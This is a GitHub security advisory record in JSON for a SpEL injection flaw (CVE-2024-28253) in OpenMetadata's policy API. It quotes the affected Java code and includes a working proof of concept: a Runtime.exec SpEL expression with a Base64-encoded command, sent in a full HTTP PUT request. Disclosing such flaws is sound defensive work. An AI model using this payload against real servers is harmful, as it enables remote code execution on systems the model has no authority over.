{"id":"GHSA-7vf4-x5m2-r6gr","summary":"OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)","details":"### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)\n\n**Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability** \n\n`CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113)\n\n```java\n  @Override\n  public void prepare(Policy policy, boolean update) {\n    validateRules(policy);\n  }\n  ...\n  public void validateRules(Policy policy) {\n    List\u003cRule\u003e rules = policy.getRules();\n    if (nullOrEmpty(rules)) {\n      throw new IllegalArgumentException(CatalogExceptionMessage.EMPTY_RULES_IN_POLICY);\n    }\n\n    // Validate all the expressions in the rule\n    for (Rule rule : rules) {\n      CompiledRule.validateExpression(rule.getCondition(), Boolean.class);\n      rule.getResources().sort(String.CASE_INSENSITIVE_ORDER);\n      rule.getOperations().sort(Comparator.comparing(MetadataOperation::value));\n\n      // Remove redundant resources\n      rule.setResources(filterRedundantResources(rule.getResources()));\n\n      // Remove redundant operations\n      rule.setOperations(filterRedundantOperations(rule.getOperations()));\n    }\n    rules.sort(Comparator.comparing(Rule::getName));\n  }\n```\n\n`prepare()` is called from [`EntityRepository.prepareInternal()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693) which, in turn, gets called from the [`EntityResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219):\n\n```java\npublic Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) {\n  repository.prepareInternal(entity, true);\n\n  // If entity does not exist, this is a create operation, else update operation\n  ResourceContext\u003cT\u003e resourceContext = getResourceContextByName(entity.getFullyQualifiedName());\n  MetadataOperation operation = createOrUpdateOperation(resourceContext);\n  OperationContext operationContext = new OperationContext(entityType, operation);\n  if (operation == CREATE) {\n    CreateResourceContext\u003cT\u003e createResourceContext = new CreateResourceContext\u003c\u003e(entityType, entity);\n    authorizer.authorize(securityContext, operationContext, createResourceContext);\n    entity = addHref(uriInfo, repository.create(uriInfo, entity));\n    return new PutResponse\u003c\u003e(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse();\n  }\n  authorizer.authorize(securityContext, operationContext, resourceContext);\n  PutResponse\u003cT\u003e response = repository.createOrUpdate(uriInfo, entity);\n  addHref(uriInfo, response.getEntity());\n  return response.toResponse();\n}\n```\n\nNote that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated.\n\nIn order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by [`PolicyResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365):\n\n```java\n@PUT\n@Operation(\n    operationId = \"createOrUpdatePolicy\",\n    summary = \"Create or update a policy\",\n    description = \"Create a new policy, if it does not exist or update an existing policy.\",\n    responses = {\n      @ApiResponse(\n          responseCode = \"200\",\n          description = \"The policy\",\n          content = @Content(mediaType = \"application/json\", schema = @Schema(implementation = Policy.class))),\n      @ApiResponse(responseCode = \"400\", description = \"Bad request\")\n    })\npublic Response createOrUpdate(\n    @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreatePolicy create) {\n  Policy policy = getPolicy(create, securityContext.getUserPrincipal().getName());\n  return createOrUpdate(uriInfo, securityContext, policy);\n}\n```\n\nThis vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.\n\n#### Proof of concept\n- Prepare the payload\n\t- Encode the command to be run (eg: `touch /tmp/pwned`) using Base64 (eg: `dG91Y2ggL3RtcC9wd25lZA==`)\n\t- Create the SpEL expression to run the system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode(\"dG91Y2ggL3RtcC9wd25lZA==\")))`\n- Send the payload using a valid JWT token:\n\n```http\nPUT /api/v1/policies HTTP/1.1\nHost: localhost:8585\nsec-ch-ua: \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nAuthorization: Bearer \u003cnon-admin JWT\u003e\naccept: application/json\nConnection: close\nContent-Type: application/json\nContent-Length: 367\n\n{\"name\":\"TeamOnlyPolicy\",\"rules\":[{\"name\":\"TeamOnlyPolicy-Rule\",\"description\":\"Deny all the operations on all the resources for all outside the team hierarchy..\",\"effect\":\"deny\",\"operations\":[\"All\"],\"resources\":[\"All\"],\"condition\":\"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))\"}]}\n```\n- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server\n\n#### Impact\n\nThis issue may lead to Remote Code Execution by a registered and authenticated user\n\n#### Remediation\n\nUse [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude *references to Java types, constructors, and bean references*.","aliases":["CVE-2024-28253"],"modified":"2026-09-10T03:50:11.211421626Z","published":"2024-04-23T21:11:23Z","database_specific":{"cwe_ids":["CWE-94"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2024-04-23T21:11:23Z","nvd_published_at":"2024-03-15T20:15:09Z"},"references":[{"type":"WEB","url":"https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28253"},{"type":"WEB","url":"https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection"},{"type":"PACKAGE","url":"https://github.com/open-metadata/OpenMetadata"},{"type":"WEB","url":"https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693"},{"type":"WEB","url":"https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219"},{"type":"WEB","url":"https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365"},{"type":"WEB","url":"https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113"},{"type":"ADVISORY","url":"https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata"}],"affected":[{"package":{"name":"org.open-metadata:openmetadata-service","ecosystem":"Maven","purl":"pkg:maven/org.open-metadata/openmetadata-service"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.3.1"}]}],"versions":["0.12.1","0.12.1.preview","0.12.2","0.12.2-REPUBLISHED","0.13.1","0.13.2","0.13.2-beta","1.0.0","1.0.0-alpha","1.0.0-beta","1.0.1","1.0.2","1.0.3","1.0.4","1.0.4.1","1.0.5","1.1.0","1.1.0-beta","1.1.1","1.1.2","1.1.2.1","1.1.3","1.1.4","1.1.5","1.1.6","1.1.7","1.2.0","1.2.0-beta","1.2.0-beta1","1.2.0-beta2","1.2.1","1.2.2","1.2.3","1.2.4","1.2.5","1.3.0","1.3.0-beta","DEMO_BETA1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-7vf4-x5m2-r6gr/GHSA-7vf4-x5m2-r6gr.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"}]}